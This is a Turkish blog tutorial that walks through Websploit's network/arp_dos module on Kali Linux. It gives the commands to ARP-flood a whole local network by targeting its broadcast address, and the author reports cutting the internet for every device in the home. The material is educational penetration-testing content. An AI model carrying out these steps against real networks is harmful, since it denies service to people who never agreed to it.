Websploit ile ARP Flood DoS Saldırısı
Websploit uzak sistemde zafiyet bulmak için kullanılan açık kaynak kodlu bir projedir. Kali'de

root@kali:~$ websploit

diyerek araç başlatılabilir:

wsf >

Websploit'te yer alan modülleri sıralamak için show modules kodu kullanılır:

wsf > show modules

Output:



Modülleri tıpkı Metasploit'te seçtiğimiz gibi seçerek çalıştırabilmekteyiz. Şimdi bir modülünün uygulamasını gösterelim:

network/arp_dos Modülü

Bu modül yerel network'te (kendi Mac Adresimiz + Router IP'si) şeklinde arp yayını yapar. Böylece router IP'sini yanlış MAC'te gösterir. Bu sebeple yerel network'teki tüm cihazlar internet paketlerini router diye bize gönderecektir ve internet bağlantıları kopacaktır. Kopan bağlantılarını onarmak için Router'ın nerede olduğunu soran arp yayını yapacaklardır. Yani Router'ın MAC'ini soracaklardır. network/arp_dos modülü devamlı (kendi Mac Adresimiz + Router IP'si) şeklinde arp yayını yapacağı için yerel network'teki cihazlar cevap olarak yine yanlış MAC adresi alacaklardır. Böylece internet paketlerini bize göndermeye devam edeceklerinden bağlantıları kesik kalacaktır. Ne zaman modülü durdurursak o zaman bağlantılarını onarıp internete çıkış sağlayabileceklerdir. Yerel network'te yapılan bu saldırıya (yani yerel network'teki tüm cihazların internet erişimini koparmaya) ARP Flood adı verilmektedir. ARP flood bir DOS çeşididir.

Şimdi bu modülü kullanalım ve yerel network'ümüzdeki cihazların internet erişimini koparalım:

wsf > use network/arp_dos
wsf : ARP_DOS > show options

Options		Value			RQ		Description
-------------	----------------	------		------------------------	
interface	eth0			yes		Network Interface Name
TARGET		192.168.1.3		yes		Target IP Address
ROUTER		192.168.1.1		yes		Router IP Address

Varsayılan olarak konulmuş değerleri kendimize göre ayarlayalım:

wsf : ARP_DOS > set ROUTER 192.168.0.1
wsf : ARP_DOS > set TARGET 192.168.0.255

Hedef olarak broadcast adresi koyduk. Böylece yerel ağdaki her cihaz (bilgisayar + telefon + televizyon) arp flood saldırısına maruz kalacaktır. Ayarlamalar sonrası son olarak modülü çalıştırma işlemi kaldı:

wsf : ARP_DOS > run

[*] Attack has been started ...

For stop the ARP Dos attack press [ENTER] : 

Saldırı böylece başlar. Bu modül saldırı için Ettercap aracından faydalanmaktadır. Çünkü saldırı başladığında ettercap ismli bir konsol ekrana gelmiştir. Gözlemlemelerimin sonucunda kardeşimin laptop interneti, annemin laptop interneti, kendi laptop'ımın interneti, annemin telefonunun interneti ve kendi telefonumun interneti gitmiştir. Dolayısıyla diyebiliriz ki evdeki genel internet erişimi komple engellenmiştir. Saldırı durdurulduğunda cihazlardaki internetin geldiği görülmüştür.

Yararlanılan Kaynak

  • Web Penetration Testing in Kali Linux, pg. 95
Bu yazı 15.10.2024 tarihinde, saat 14:31:03'de yazılmıştır. 15.10.2024 tarihi ve 11:48:13 saatinde ise güncellenmiştir.
Yazar : Hasan Fatih ŞİMŞEK Görüntülenme Sayısı : 160
Yorumlar
Henüz yorum girilmemiştir.
Yorum Ekle
*
* (E-posta adresiniz yayınlanmayacaktır.)
*
*

#Arşiv


#Giriş

ID :
Şifre :